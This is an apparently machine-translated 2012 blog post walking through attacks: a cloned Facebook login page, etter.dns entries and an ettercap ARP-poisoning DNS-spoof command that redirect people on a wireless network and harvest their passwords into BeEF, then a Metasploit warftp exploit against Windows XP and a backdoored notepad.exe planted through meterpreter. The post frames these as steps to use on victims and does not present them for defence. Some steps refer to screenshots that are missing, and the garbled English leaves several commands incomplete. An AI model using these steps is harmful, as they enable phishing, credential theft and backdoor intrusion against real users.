!!!

Monday, February 27, 2012

Web Browser Exploitasi & Metasploit Using MSF

browser Exploit
First of all open-ng beef




then open the beef on your Mozilla browser and enter the User and Password: beef / beef






This time I will be exploitable browser using WLAN media as for the way he is using ettercap
First I make a fake facebook login with facebook page how to copy the original source on the action then I replace with "http://192.168.56.1:3000/demos/butcher/index.html" 








then edit your etter.dns by entering
facebook.com 192.168.56.1
www.facebook.com 192.168.56.1
/ facebook.com 192.168.56.1

Setting above means when a client on the network request facebook page it will be transferred to the address 192.168.56.1 (your localhost).
after doing the above configuration is time to run ettercap command.
ettercap-T-q-i wlan0-P dns_spoof-M arp / / / /




in addition you get a username and password you have also managed to divert the original facebook page to address the exploitation of beef that can target the web browser
after the victim to enter a user and password then click enter again then the page will be redirected to a page Beef
Control Panel and look at the Beef





from here you can already meksploitasi web browser, because it has been entered on the net beef.

Metasploit using MSF


As for its use as below ..
we will exploit windows through warftp application, first of all looking at msfconsole warftp module





after that use the module as shown below warftp




Then enter the address of the HOST (IP Address of victims)



In this module there are several types of windows that can be exploited, and therefore we must determine the type of target system that will diexploitasi, in this case the target using XP sp3
After the steps above, it is time to enter the victim system
Once inside the victim system, it is time to install a backdoor, while the tools used are msfpayload and msfencode. In this experiment I created a backdoor by leveraging existing application notepad.exe on Windows XP, as for how its use as follows
After the above steps it is time to upload a backdoor that was made ​​earlier by using meterpreter,
after the upload is complete run the following command
with the above command means that we are in a state of Listening, in other words when the victim running the application notepad.exe then we can enter into the victim system.


Posted by at 11:34 AM

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)